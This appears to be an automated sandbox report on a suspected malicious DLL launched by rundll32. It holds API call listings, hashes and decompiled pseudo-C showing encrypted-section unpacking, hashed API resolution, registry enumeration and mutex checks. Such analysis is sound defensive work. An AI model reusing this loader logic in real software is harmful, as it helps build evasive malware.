memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
String ID:
API String ID: 2387776105-0
Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003E58 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000180003EE6
HeapFree.KERNEL32 ref: 0000000180003EFA
HeapFree.KERNEL32 ref: 0000000180003F0E
HeapFree.KERNEL32 ref: 0000000180003F22

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$ErrorLast
String ID:
API String ID: 2332451156-0
Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005BDC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,00000000,0000000180001A27), ref: 0000000180005C15
memcpy.NTDLL ref: 0000000180005C31
EnterCriticalSection.KERNEL32 ref: 0000000180005C45
LeaveCriticalSection.KERNEL32 ref: 0000000180005C72

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AllocEnterHeapLeavememcpy
String ID:
API String ID: 224082080-0
Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C00 Relevance: 5.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C29
HeapAlloc.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C3F
memcpy.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C56
memset.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C68

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: AllocHeaplstrlenmemcpymemset
String ID:
API String ID: 422472530-0
Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5960, Parent PID: 2512COMMON

Executed Functions

Function 000000018000508C Relevance: 18.2, APIs: 12, Instructions: 241
memoryregistrythreadCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t55;
				long _t57;
				void* _t65;
				void* _t114;
				void* _t115;
				long long* _t146;
				void* _t147;
				void* _t153;
				int _t188;
				long long _t189;
				int _t191;
				long long _t192;
				struct _CRITICAL_SECTION* _t198;
				void* _t201;
				void* _t202;
				signed short* _t211;
				void* _t214;
				void* _t215;
				long long _t216;
				void* _t217;
				long _t219;
				long _t223;
				void* _t225;

				_t154 = __rbx;
				_t146 = __rax;
				_t115 = __esi;
				 *((long long*)(_t201 + 0x20)) = __rbx;
				 *((long long*)(_t201 + 8)) = __rcx;
				_t202 = _t201 - 0x230;
				_t199 =  *0x8000d4a0;
				r14d =  *0x8000d498;
				HeapAlloc(_t225, _t223, _t219);
				r12d = 0;
				_t189 = __rax;
				if (__rax == _t217) goto 0x80005419;
				memset(_t217, _t188, _t191);
				InitializeCriticalSection(_t198);
				_t5 = _t189 + 0x98; // 0x98
				_t216 = _t5;
				 *_t216 = _t216;
				 *((long long*)(__rax + 0xa0)) = _t216;
				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
				E00000001180007678(__ecx, __rax, _t154, _t191);
				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t146 == _t217) goto 0x80005144;
				r9d = 0;
				r8d = 0;
				 *_t146();
				goto 0x80005147;
				_t147 = _t217;
				 *(_t189 + 0x28) = _t147;
				if (_t147 != _t217) goto 0x8000515b;
				GetLastError();
				goto 0x80005408;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t192 =  *0x8000d4a0;
				if (_t192 == _t217) goto 0x80005226;
				 *_t192 = r12w; // executed
				_t55 = RegOpenKeyW(??, ??, ??); // executed
				if (_t55 != r12d) goto 0x80005216;
				goto 0x800051cf;
				r12d = r12d + 1;
				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
				r9d = 0x104; // executed
				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
				if (_t57 == 0) goto 0x800051b6;
				r12d = 0;
				if (_t57 != 0x103) goto 0x80005203;
				 *0x8000d480 = _t192;
				RegCloseKey(??); // executed
				if (r12d == r12d) goto 0x80005234;
				HeapFree(??, ??, ??);
				goto 0x8000522b;
				if (8 != r12d) goto 0x8000540f;
				_t193 =  *0x8000d490;
				r8d = 8;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
				_t28 = _t189 + 8; // 0x8
				_t186 = _t28;
				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x30)) = 0x180000000;
				if (0x180000000 == _t217) goto 0x800052e2;
				_t30 = _t189 + 8; // 0x8
				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x38)) = 0x180000000;
				_t90 =  !=  ? r12d : 8;
				_t132 = ( !=  ? r12d : 8) - r12d;
				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
				goto 0x8000540f;
				_t211 =  *0x8000d490 + 0x18000f000;
				r9d = _t211[1] & 0x0000ffff;
				r11d =  *_t211 & 0x0000ffff;
				_t215 = __r9 + 8;
				if (_t216 - _t215 <= 0) goto 0x80005339;
				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
				goto 0x8000533c;
				if (_t217 != _t217) goto 0x8000534b;
				goto 0x8000540f;
				r14d = r14d ^ 0xecb028fc;
				if (_t216 - _t215 <= 0) goto 0x8000536e;
				if (r14d == r12d) goto 0x80005371;
				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
				goto 0x80005371;
				_t153 = _t217;
				if (_t153 == _t217) goto 0x80005341;
				 *(_t189 + 0x40) = _t211;
				 *0x8000d488 = _t189;
				GetModuleHandleA(??);
				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t153 == _t217) goto 0x800053be;
				r8d = GetCurrentThreadId();
				 *_t153();
				goto 0x800053c1;
				if (_t217 == _t217) goto 0x80005150;
				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
				if (_t153 == _t217) goto 0x800053ee;
				 *_t153();
				goto 0x800053f1;
				if (r12d != r12d) goto 0x8000541e;
				goto 0x80005150;
				asm("lock add dword [ebp+0x38], 0x1");
				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
				E00000001180005578(_t154, _t189, _t217);
				goto 0x8000541e;
				return 8;
			}

APIs

HeapAlloc.KERNEL32 ref: 00000001800050CB
memset.NTDLL ref: 00000001800050E8
InitializeCriticalSection.KERNEL32 ref: 00000001800050F1

Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B6B
Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B8B

Part of subcall function 0000000180007678: GetModuleHandleA.KERNEL32 ref: 00000001800076C7

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32 ref: 0000000180005150
HeapAlloc.KERNEL32 ref: 0000000180005171
RegOpenKeyW.ADVAPI32 ref: 00000001800051A5
RegEnumKeyW.ADVAPI32 ref: 00000001800051E2
RegCloseKey.KERNELBASE ref: 000000018000520B
HeapFree.KERNEL32 ref: 000000018000521E
memcpy.NTDLL ref: 000000018000524E
GetModuleHandleA.KERNEL32 ref: 0000000180005383
GetCurrentThreadId.KERNEL32 ref: 00000001800053A9

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
String ID:
API String ID: 2014251338-0
Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005CA4 Relevance: 7.6, APIs: 5, Instructions: 88
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateFileW.KERNELBASE ref: 0000000180005D04
RtlInitUnicodeString.NTDLL ref: 0000000180005D20
NtQueryDirectoryFile.NTDLL ref: 0000000180005D8C
CloseHandle.KERNEL32 ref: 0000000180005DC5
GetLastError.KERNEL32 ref: 0000000180005DCD

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
String ID:
API String ID: 2375947951-0
Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004F1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t46;
				long long _t56;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				long long _t80;
				long long _t82;
				void* _t83;
				long long _t85;
				void* _t91;
				void* _t92;
				long _t93;
				long _t95;
				long _t97;

				_t92 = __r11;
				_t56 = _t85;
				 *((long long*)(_t56 + 8)) = __rbx;
				 *((long long*)(_t56 + 0x10)) = _t82;
				 *((long long*)(_t56 + 0x18)) = __rsi;
				 *((long long*)(_t56 + 0x20)) = __rdi;
				_t83 = __rcx;
				r8d = 0;
				HeapCreate(_t97, _t95, _t93); // executed
				_t80 = _t56;
				if (_t56 == 0) goto 0x8000506b;
				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t75 = _t56 + _t72 + 0x68;
				_t22 =  *_t75;
				if (_t22 == 0) goto 0x80004ffc;
				if (_t22 == 0x7373622e) goto 0x80004f8a;
				_t76 = _t75 + 0x28;
				_t23 =  *_t76;
				if (_t23 != 0) goto 0x80004f79;
				if (_t23 == 0) goto 0x80004ffc;
				r13d =  *(_t76 + 0x10);
				r12d =  *(_t76 + 0x14);
				r12d = r12d ^  *(_t72 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t56 == 0) goto 0x80004ff5;
				r9d = r12d;
				r8d = r13d;
				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
				r11d =  *((intOrPtr*)(_t76 + 0xc));
				 *0x8000d490 = _t56 - _t92 - _t83;
				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
				goto 0x80005001;
				goto 0x80005001;
				if (2 == 0) goto 0x80005010;
				HeapDestroy(??);
				goto 0x8000506b;
				HeapAlloc(??, ??, ??);
				if (0x80011040 != 0) goto 0x80005049;
				HeapDestroy(??);
				goto 0x8000506b;
				0x8000236a();
				 *0x180011048 = _t80;
				 *0x8000d4a0 = 0x80011040;
				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
			}

APIs

HeapCreate.KERNELBASE(?,?,?,000000018000134F), ref: 0000000180004F4B
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 0000000180004FA5
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 0000000180005008
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 000000018000502B
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 000000018000503C

Strings

.bss, xrefs: 0000000180004F79

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocDestroy$Create
String ID: .bss
API String ID: 388876957-3890483948
Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008708 Relevance: 6.1, APIs: 4, Instructions: 70
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
				void* _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				void* _t45;
				long long _t46;
				long long _t47;
				struct _SECURITY_ATTRIBUTES* _t57;
				long long _t60;
				int _t62;
				WCHAR* _t66;
				void* _t69;
				void* _t76;
				void* _t79;

				_t47 = __rbx;
				_t45 = _t69;
				 *((long long*)(_t45 + 8)) = __rbx;
				r9d = 0;
				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
				 *((intOrPtr*)(_t45 - 0x38)) = 0;
				0x800085dc(); // executed
				if (__eax == 0) goto 0x800087f7;
				_a16 =  *__rcx;
				_t46 =  &_a24;
				r9d = 0;
				_v88 = _t46;
				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
				if (_t46 == _t47) goto 0x800087f7;
				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t46 == _t47) goto 0x800087c0;
				CreateMutexW(_t57, _t62, _t66); // executed
				goto 0x800087c3;
				_t60 = _t47;
				if (_t60 == _t47) goto 0x800087e9;
				if (GetLastError() != 0xb7) goto 0x800087e0;
				FindCloseChangeNotification(??); // executed
				goto 0x800087e9;
				_a24 = _t60;
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

Part of subcall function 00000001800030C8: lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
Part of subcall function 00000001800030C8: HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000314B
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000317D

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateMutexW.KERNELBASE ref: 00000001800087B9
GetLastError.KERNEL32 ref: 00000001800087C8
FindCloseChangeNotification.KERNELBASE ref: 00000001800087D8
HeapFree.KERNEL32 ref: 00000001800087F1

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
String ID:
API String ID: 4170216436-0
Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007B94 Relevance: 4.6, APIs: 3, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocateHeapmemset
String ID:
API String ID: 669713250-0
Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002464 Relevance: 4.5, APIs: 3, Instructions: 30
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
				long long _t20;
				void* _t24;
				void* _t31;
				void* _t32;

				_a8 = __rbx;
				_a16 = __rsi;
				LoadLibraryA(??); // executed
				_t24 = __rax;
				if (__rax == 0) goto 0x800024af;
				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
				_t20 = _a24;
				 *_t20 = _t24;
				 *__rdx = _t20;
				goto 0x800024b7;
				FreeLibrary(??);
				goto 0x800024b7;
				return GetLastError();
			}

0x180002464
0x180002469
0x180002476
0x18000247c
0x180002482
0x180002495
0x180002497
0x18000249c
0x18000249f
0x1800024a2
0x1800024a7
0x1800024ad
0x1800024c8

APIs

LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF

Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Library$AllocateErrorFreeHeapLastLoadmemset
String ID:
API String ID: 105124555-0
Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006DCC Relevance: 3.8, APIs: 3, Instructions: 62
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
				int _t27;
				void* _t46;
				long long _t48;
				intOrPtr* _t63;
				long long _t65;
				intOrPtr* _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t74;
				WCHAR* _t77;
				WCHAR* _t80;

				_t48 = __rbx;
				_t46 = _t68;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = _t65;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				_t69 = _t68 - 0x30;
				_t63 = __rcx;
				_t66 = __rdx;
				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
				 *_t66 =  *_t63;
				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
				_t27 = lstrcmpiW(_t77); // executed
				if (_t27 == 0) goto 0x80006e7a;
				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
				r11d =  *((intOrPtr*)(_t69 + 0x20));
				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
				HeapFree(??, ??, ??);
				goto 0x80006e8f;
				return 8;
			}

APIs

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
